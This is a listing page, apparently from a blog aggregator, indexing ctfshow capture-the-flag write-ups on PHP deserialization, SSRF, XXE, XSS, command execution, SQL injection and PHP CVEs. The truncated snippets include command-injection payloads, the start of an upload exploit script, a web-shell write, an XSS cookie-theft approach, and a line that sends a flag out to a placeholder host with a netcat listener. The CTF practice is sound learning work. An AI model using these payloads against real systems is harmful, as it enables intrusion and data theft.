ctfshow

php反序列化之字符串逃逸详解

字符串逃逸过滤后字符串变多字符串变多原理详解过滤后字符串变少总结php反序列化–字符串逃逸PHP反序列化的字符串逃逸,一共分有两种情况,情况一:过滤后字符串变多,情况二:过滤后字符变少(本篇文章默认已有反序列化相关知识基础)过滤后字符串变多以ctfshow-web262
·2022-03-18 15:05

CTFshow-卷网杯-crypto-真·简单·不卷·现代密码签到(复现)

fromCrypto.Util.numberimportbytes_to_longfromsecretsimportp,q,r,s,t,flagn=p*q*r*s*te=2m=bytes_to_long(os.urandom(500)+flag)c=pow(m,e,n)print(p,q,r,s,t,sep='\n')print(c)'''14533236770094430374754891216
这就是强者的世界么·2022-03-11 10:40

php反序列化之字符串逃逸

这里以ctfshow262为例。
二码农丫·2022-03-07 15:58

CTFshow-php反序列化

详解wp可参考此处该博客仅提供大致内容,还望包涵。web255isVip;}publicfunctionlogin($u,$p){return$this->username===$u&&$this->password===$p;}publicfunctionvipOneKeyGetFlag(){if($this->isVip){global$flag;echo"yourflagis".$flag;
二码农丫·2022-03-07 15:57

2021ctfshow月饼杯web

随便写写给自己看,同时也热烈欢迎师傅的意见与批评web签到直接跑脚本。WelcometoCTFSHOW';echo'PoweredbyPHPthink5.0.2';echodirname(__FILE__);if(!empty($run[2])){echo'ZmxhZyBpcyBub3QgaGVyZSBidXQgaXQgaXMgaW4gZmxhZy50eHQ=';}if(!empty($run[1
二码农丫·2022-03-07 15:01

ctfshow 第二届月饼杯 misc部分writeup

ctfshow第二届月饼杯misc部分writeup说是部分其实就一道月饼起义下载得到一个损坏的zip利用binwalk或者bandizip自带的修复都能得到一个hint.txt,解压后猜测是零宽隐写,
AshMOB·2022-02-22 12:37

ctfshow SSRF web351-web360 wp

文章目录认识SSRFweb351web352web353web354web355web356web357web358web359、web360认识SSRF浅谈SSRF漏洞SSRF详解SSRF(Server-SideRequestForgery)服务端请求为伪造,SSRF是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。web351可以访
是Mumuzi·2022-02-21 13:24

ctfshow XXE web373-web378 wp

文章目录web373web374-376web377web378web373XXE(XMLExternalEntityInjection)全称为XML外部实体注入。注入的是XML外部实体参考文章:一篇文章带你深入理解漏洞之XXE漏洞libxml_disable_entity_loader(false);:禁止加载外部实体。一个实体由三部分构成:一个和号(&),一个实体名称,以及一个分号(;)fla
是Mumuzi·2022-02-21 13:54

CTFSHOW】web入门 NodeJS

web334web335web336web337web338web339web340web341web342web343web344参考资料写在前面web334下载附件,其中user.js得到用户名为:CTFSHOW
不会敲码的小火鸡·2022-02-07 10:03

ctfshow nodejs wp

/modules/user').items;users变量是引入了user.js里面item的值,账号CTFSHOW,密码1234562.varfindUser=function(name,password
yink12138·2022-02-07 10:03

CTFshow_终极考核_EXP

EXPALLINHEREexpexpexpヾ(・ω・`。)importrequestsimportbase64importreimporttimedefgetShell(url):burp0_url=url+"system36d/users.php?action=upload"burp0_headers={"Cache-Control":"max-age=0","Upgrade-Insecure-
ScyLamb·2022-02-07 10:33

CTFshow_终极考核_个人WP

CTFshow_终极考核参考不打算参考0x00web640flag_640=ctfshow{060ae7a27d203604baeb125f939570ef}这里就陆陆续续记录些杂乱的做题笔记吧做之前提醒自己信息收集后果必有前因
ScyLamb·2022-02-07 10:32

CTFshow——组件漏洞

前言:组件漏洞最大的收获应该就是锻炼自己复现漏洞的能力吧2333,其次就是网上搜索漏洞的能力,很多组件都还没接触过,只得照着网上的分析来复现了文章目录前言:580——Bash远程代码执行漏洞“破壳”(CVE-2014-6271)581——yaml_parse()582——nodejs反序列化583——phpmailer组件584——Spring组件(CVE-2017-8046)585——Apach
D.MIND·2022-02-07 10:32

ctfshow XSS web316-web333 wp

可能写的有点啰嗦,记录自己做题的过程文章目录web316web317web318web319web320web321web322web323web324web325web326web327web328web329web330web331web332web333web316后台会每隔一段时间(一般为15秒)去访问一次我们的链接(毕竟要领10个鸡蛋bot要康康你的分享状态),当BOT访问我们的xss的
是Mumuzi·2022-02-07 10:32

ctfshow 1024杯

1024_WEB签到phpinfo中有个自定义的函数,不多说了,自己找找看把1024_柏拉图双写绕过file://,然后利用file协议读取文件,index.php现在是知道怎么过滤的了upload.phperror_reporting(0);if(isset($_FILES["file"])){if(($_FILES["file"]["type"]=="image/gif")&&(substr(
小Low娃·2022-02-07 10:32

ctfshow phpCVE web311-web315 wp

可能写的有点啰嗦,记录自己做题的过程文章目录web311:CVE-2019-11043web312:CVE-2018-19518web313:CVE-2012-1823web314:日志文件包含web315:XDebug远程调试漏洞web311:CVE-2019-11043phpCVE,打开只有一个whereisflag页面,注释也就只说了cve于是去百度看看,发现这也太多了吧。看看群主的描述似曾
是Mumuzi·2022-02-07 10:02

ctfshow 代码审计 web301-web310 wp

废话可能比较多,主要记录自己从那么多文件中找漏洞点的过程文章目录参考博客web301web302web303web304web305web306web307web308web309web310参考博客https://blog.csdn.net/rfrder/article/details/113924013https://blog.csdn.net/miuzzx/article/details/1
是Mumuzi·2022-02-07 10:01

ctfshow-1024杯

比赛期间,太菜,没做出多少,赛后wp,记录一下文章目录Web1024_WEB签到1024_fastapi1024_hello_world1024_图片代理1024_柏拉图Misc1024_签到1024_重新签到1024_兔耳1024_调频收音机1024_非常简单1024_1024zip套娃1024_大威天龙Crypto1024_Trick1024_密码系统1024_麻辣兔头第七锅Web1024_W
airrudder·2022-02-07 10:30

ctfshow NodeJs web334-web344 wp

文章目录什么是nodejsweb334web335web336web337web338web339预期解非预期解web340web341web342-343web344什么是nodejsNode.js是一个基于ChromeV8引擎的Javascript运行环境。可以说nodejs是一个运行环境,或者说是一个JS语言解释器而不是某种库Nodejs是基于Chrome的V8引擎开发的一个C++程序,目的
是Mumuzi·2022-02-07 10:00

[ctfshow]入门2

目录web14(默认配置)web15(社会工程学)web16(探针泄露)web17(sql备份)wed18(js小游戏)web19(数据库泄露)web20(mbd文件)杂项5杂项6,杂项6杂项7杂项8杂项10杂项11隐写1隐写2萌新隐写5web14(默认配置)那我们访问editor,出现如下页面在图片里面找到fl000g.txt,放在网址中访问web15(社会工程学)右下角看到邮箱访问admin看
pipasound·2022-02-04 16:02

[ctfshow]入门5

目录命令执行前言:web29web30web31web32web33web34web35web36web37web38web39web40web42web43web44web45web46web47web48web49web50web51web52web53web54总结misc42misc43misc44misc45misc46misc47misc48misc49前言:本文大量参考ThnPkm大
pipasound·2022-02-04 16:02

[ctfshow内部赛]web wp

签到F12,有register.phpimportrequestsimportreurl1="http://7fc1279d-6a4b-4fca-968f-235322686f5b.challenge.ctf.show/register.php"url2="http://7fc1279d-6a4b-4fca-968f-235322686f5b.challenge.ctf.show/login.ph
Snakin_ya·2021-12-03 10:36

[CTFSHOW]CTFSHOW击剑杯 部分WP

进群得码群里发送击剑杯签到即可所以就发送“击剑杯签到即可”然后得到flag给我看看三血name='ctfshow第一深情';$this->your_answer='Onlyyouknow';$this-
Sapphire037·2021-11-13 18:12

CTF训练之路2--ctfshow内部赛

文章目录签到登录就有flag出题人不想跟你说话.jpg蓝廋一览无余(需要再次学习)签退参考资料签到一进去就是login界面,F12看到有个register.php,说明就是一个二次注入的sql注入题。所谓二次注入,就是再register中构造sql语句,然后登录login来触发。找到羽师傅的脚本importrequestsimportreurl_register="http://7b093e85-
Z3eyOnd·2021-11-07 22:43

ctfshow web入门反序列化

文章目录魔术变量web254web255web256web257web258web259web260web261web262web263web264web265web266web267web268~270web271web272~273web274web275web276web277~278魔术变量:__sleep()//在对象被序列化之前运行__wakeup()//将在反序列化之后立即调用(当反
qq_53063436·2021-11-06 16:42

CTF训练日记1--ctfshow萌赛

文章目录签到题给她web_假赛生萌新记忆签到题这个题,比较简单,直接使用分号,执行多个命令来绕过payload:1;ls;1可以再次回顾一下,||,&&,&,|,;的作用Linux的特殊符号想法2:其实这个题,看到curl,我想到了用反弹shell?url=xxxx:10000?p=$(ls);1?url=xxxx:10000?p=$(catflag);1nc-lvvp10000但是监听端口后,出
Z3eyOnd·2021-11-03 12:07

php特性<2>--ctfshow

文章目录1.sha1的绕过web104,1062.php变量覆盖web1053.parse_str的绕过web1074.ereg%00正则截断web1085.php异常类web1096.FilesystemIterator类的使用web1107.GLOBALS超全局变量web1118.php伪协议WEB1129./proc/self/root绕过web11310.php伪协议--filterweb
Z3eyOnd·2021-11-01 20:33

CTFSHOW 内部赛web writeup

CTFSHOW内部赛webwriteup太菜了不会写,按着羽师傅和bmth666师傅的writeup复现签到打开界面如上,右键源码可以看到有一个register.php注册界面,需要利用login和register
AshMOB·2021-10-29 22:06

CTFSHOW web入门 命令执行+文件包含+PHP特性

刷题时间记录表ID开始时间结束时间刷题范围12021.08.2319:202021.08.2321.30web41-4522021.08.2422:162021.08.250:04web46-5432021.08.2517:06(上班划水)2021.08.2518:00web55-web5842021.08.2520:262021.08.2522:39web59-web7252021.08.262
JJT_with_hair·2021-10-26 10:37

SSRF-CTFshow

:CTFshowweb351web352web353web354web355web356web357web358web359web360参考文献前言:关于互联网协议的一些认识:互联网协议1互联网协议2CTFshow
Z3eyOnd·2021-10-20 17:50

CTFshow—web入门——命令执行

web入门——命令执行命令执行web29web30web31web32web33web34web35web36web37web38web39web40web41web42web43web44web45web46web47web48web49web50web51web52web53web54web55解法一解法二解法三web56web57web58web59web60web61web62web63w
一aue·2021-10-07 19:19

CTFSHOW sql注入(一)

title:CTFSHOW-sql注入(一)data:2021-09-15tags:CTF-webCTFSHOWsql注入(一)开始一周的高强度sql注入训练,先从ctfshow的基础开始。
k1he·2021-10-04 17:05

CTFshow刷题日记-WEB-PHPCVE(web311-315)包括PHP-fpm远程代码执行,PHPimap_open函数任意命令执行,PHP-CGI远程代码执行,XDebug 远程调试漏洞

web311-CVE-2019-11043-PHP-fpm远程代码执行漏洞提示:似曾相识,就这一个文件,不用扫描注释中只有一个用burp抓包发现响应行中的X-Powered-By字段很可疑谷歌之后发现该PHP版本存在漏洞:PHP远程代码执行漏洞(CVE-2019-11043漏洞原理CVE-2019-11043是一个远程代码执行漏洞,使用某些特定配置的Nginx+PHP-FPM的服务器存在漏洞,可允
Ocean:)·2021-10-03 15:12

CTFshow刷题日记-WEB-代码审计(web301-310)SQL注入、SSRF打MySQL、SSRF打FastCGI、SSRF文件读取

web301-SQL注入下载源码,在checklogin.php页面存在SQL注入$_POST['userid']=!empty($_POST['userid'])?$_POST['userid']:"";$_POST['userpwd']=!empty($_POST['userpwd'])?$_POST['userpwd']:"";$username=$_POST['userid'];$user
Ocean:)·2021-10-03 10:23

CTFshow刷题日记-WEB-XSS(web316-333)

web316-无过滤反射型XSS大概就是要生成Xss代码链接,获取管理员cookie,后台bot每隔一段时间自动点击链接方法一:xss平台利用xss平台生成链接xss平台https://xsshs.cn/,https://xss.pt/,http://xsscom.com在xss平台创建项目,选择默认模块即可,复制生成的xss代码,复制到题目留言框中刷新下页面,然后在平台查看项目方法二:自动接收脚
Ocean:)·2021-09-29 19:02

CTFshow月饼杯(第二届) 中秋快乐 部分wp

苟,都可以苟只要我osint做的够快我就不会被刷掉.jpg体验很好,下次还来(注:tao2更新目录1、webweb签到2、crypto我的木头啊!!!一封信3、miscprojectTao-1projectTao-2有手就行杂项签到HelloFlag3、osintPS打卡第一天见字如面我的朋友抬头看看套套去哪儿幸福小镇以卵击石1、webweb签到直接贴脚本吧,web不太懂不解释
FW_Suica·2021-09-21 11:05

[ctf web]XXE通过DTD读取文件+XML和DTD基础语法(以[ctfshow]web_ak4观心和[NCTF2019]Fake XML cookbook为例)

XML基础XML文件可以分为三部分:XML声明DTD文档定义类型。文档元素根元素foo,子元素note,属性categoryXML语法XML被设计为传输和存储数据基本语法:-所有XML元素都须有关闭标签。-XML标签对大小写敏感。-XML必须正确地嵌套。-XML文档必须有根元素。-XML的属性值须加引号。预定义的实体引用>大于&&和号’’单引号""引号注释DTD文档类型定义DTD可定义合法的XML
shu天·2021-08-23 11:14

ctfshow web入门 命令执行前篇(web29-web54)

目录web29web30web31web32web33web34-web36web37web38web39web40web41web42web43web44web45web46web47web48web49web50web51web52web53web54web29重定向符6.%09所以这个题的payload?c=echo(`more%09f*`);再附上大佬们的payload?c=eval($_
parkour-·2021-08-18 22:39

ctfshow-SQL注入篇[Web214-Web233]

参考:https://blog.csdn.net/solitudi/article/details/110144623Web214在首页的select.js中可以看到:向/api/提交了两个参数:ip和debug。经过手动测试,参数ip可以进行sql注入,如下会有延迟:基于此可以写出s基于时间盲注的脚本:importrequestsurl="http://38d705ce-9c40-4fb0-a9
一碗海鲜汤·2021-08-08 17:42

ctf-web刷题-ctfshow-爆破-web23

看一下代码接收get参数token,然后把接收到的值进行md5加密,再判断第2位和第15位是否完全相等并且第十五位和第十八位也完全相等完全前面的要求之后还要判断第二位第十五位第十八位取int值后进行相加是否等于第32位这里的话给出的解题方案就是通过脚本1-9a-z组合生成md5然后进行判断是否符合条件#coding:utf-8#啊韬importhashlibdic='0123456789qazws
None安全团队·2021-08-01 15:55

[web安全学习] ctfshow-php特性总结

文章目录一.常见php函数1.intval2.strpos3.is_numeric4.var_dump()5.call_user_func()函数5.parse_str6.strrev7.get_defined_vars二.常见绕过方法尝试添加加号+和空格进行绕过进制绕过采用伪协议绕过如:数组绕过三目运算符+变量覆盖PHP弱类型比较and与&&的区别+反射类ReflectionClass的使用绕过
Y1seco·2021-07-30 23:19

命令注入ctfshow

title:CTFshow命令注入date:2021-07-15tags:[ctf]description:刷题记录搜索引擎http://helosec.com/正则解释https://regexper.com
_Stary·2021-07-20 21:36

[网鼎杯2018]Unfinish&&CTFSHOW内部赛签到题

CTFSHOW那个是根据[网鼎杯2018]Unfinish改编的,有个源码泄露友好些吧,然后过滤的东西不一样,然后感觉不错就总结下然后扫目录的时候有源码泄露www.zip,下载后读下代码user.php10
Je3Z·2021-07-15 23:31

CTFSHOW funny&unusualrsa系列

CTFSHOWfunny&unusualrsa系列funnyrsa1funnyrsa2funnyrsa3unusualrsa1unusualrsa2unusualrsa3unusuarsa4unusualrsa5De1CTF2019-BabyRSA0ctf2016-RSA?抱我妈呀,完了这两个系列有针对RSA密码中,gcd(e,φ)≠1gcd(e,\varphi)\neq1gcd(e,φ)=1的
4XWi11·2021-07-09 12:10

ctfshow WEB AK赛

WEBAK赛签到_观己考点思路Payloadweb1_观字考点思路Payloadweb2_观星考点思路Payloadweb3_观图考点思路Payloadweb4_观心考点思路Payload签到_观己考点文件包含思路盲猜一波flag在根目录下,所以直接读取试试Payload源码web1_观字考点正则表达式绕过,ssrf思路观察源码,发现其过滤了很多关键词,源码提示我们flag的位置但是.被过滤了,想
H3rmesk1t·2021-06-14 17:07

CTFshow——中期测评

前言一个网站给群主大大搞了那么多题,。不过做到后面根本做不动,我太菜了,爬了爬了,等晚一点再爬回来看看师傅们怎么解的。文章目录前言486——目录穿越487——SQL488——489——490——491——492——493——494、495——496——bool盲注497——SSRF498——SSRF、redis499——500——501——502——503——文件上传+Phar反序列化504——(
D.MIND·2021-05-23 00:43

[ctfshow]大牛杯

web_checkin');for($i=1;$i接下来就是往某个目录下的php文件里面写东西了file_put_contents("$dir"."index.php","<?=`nl%09/*`成功获取flagMudupx脱壳后,拉到ida,找到游戏结束那一块flag在这里
huamanggg·2021-05-16 15:45

Ctfshow 五月赛 大牛杯 Web&BlockChain

web_checkinban了这些:acegikmoqsuwy13579\+_\(&-#@~\[{\"\.,:直接拿短标签和nl,反引号打:?>settings=array('display_errors'=>'On','allow_url_fopen'=>'On');$this->params=array();}publicfunction__wakeup(){foreach($this->se
bfengj·2021-05-03 23:16

ctfshow 大牛杯web

文章目录web_checkineasy_unserializeeasy_cmsRealWorld_CyberShowweb_checkin。。。。。。我傻了数错字符了。。。。。直接?code=?>b`开始竞争importrequestsimportthreadingimportsyssession=requests.session()url1="http://ba2bd9c4-6f58-45a1-
yu22x·2021-05-03 20:41

CTFSHOW---WEB AK赛 -- 包含日志 ---sql注入 ---- xxe ----

00000+一、自己做:三、看WP:web3_观图一、自己做:三、学习WP:web4_观心一、自己做:这个应该是可以的,只不过这里不对,调用外部文件执行RCEweb0_签到_观己一、自己做:吐槽一句,ctfshow
Zero_Adam·2021-04-29 22:32
上一页 9 10 11 12 13 14 15 16 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他